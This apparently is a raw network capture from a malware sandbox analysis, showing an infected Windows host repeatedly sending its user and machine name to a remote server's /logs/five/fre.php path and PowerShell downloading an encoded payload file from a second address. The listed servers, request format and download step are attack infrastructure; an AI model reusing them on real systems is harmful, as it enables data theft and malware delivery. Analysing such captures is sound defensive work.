                                                                                                  Oct 30, 2024 08:05:14.530560017 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:14 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  11192.168.2.224918494.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:14.718401909 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:14.723916054 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:15.723954916 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:15 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  12192.168.2.224918594.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:15.937042952 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:15.942457914 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:16.903040886 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:16 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  13192.168.2.224918694.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:17.127975941 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:17.133399010 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:18.113903999 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:17 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  14192.168.2.2249188198.46.178.151803588C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:19.270663977 CET76OUTGET /66/LLORG.txt HTTP/1.1
                                                                                                  Host: 198.46.178.151
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 30, 2024 08:05:19.935053110 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 30 Oct 2024 07:05:19 GMT
                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                  Last-Modified: Wed, 30 Oct 2024 04:26:09 GMT
                                                                                                  ETag: "22aac-625aa19ec83cb"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 141996
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: text/plain
                                                                                                  Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                  Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:19.935080051 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:19.935091972 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:19.935162067 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:19.935266018 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:19.935276985 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:19.935291052 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:19.935302973 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:19.935553074 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:19.935564041 CET460INData Raw: 43 4a 6b 51 2b 76 39 32 6f 63 36 33 73 34 2f 32 62 54 30 45 2b 41 77 46 47 47 6b 51 43 4a 70 51 43 70 2b 31 42 67 50 41 53 4b 41 4b 42 41 64 2b 43 4a 6b 30 58 48 41 2b 41 49 6b 51 43 4a 6b 47 35 42 4d 51 43 4a 6b 51 43 67 53 41 51 6e 76 64 2f 39
                                                                                                  Data Ascii: CJkQ+v92oc63s4/2bT0E+AwFGGkQCJpQCp+1BgPASKAKBAd+CJk0XHA+AIkQCJkG5BMQCJkQCgSAQnvd/9//vLkQCJkQCJkQCJkfRCJ09PkQCJkQCJYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:19.940712929 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  15192.168.2.224918794.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:19.272557020 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:19.277981997 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:20.257268906 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:20 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  16192.168.2.224918994.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:20.435261965 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:20.440588951 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:21.414083958 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:21 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  17192.168.2.224919094.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:21.583529949 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:21.588924885 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:22.547877073 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:22 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  18192.168.2.224919194.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:22.895589113 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:22.901000977 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:23.878453016 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:23 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  19192.168.2.224919294.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:24.026181936 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:24.031737089 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:25.013262033 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:24 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  20192.168.2.224919394.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:25.162672043 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:25.168138027 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:26.164892912 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:26 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
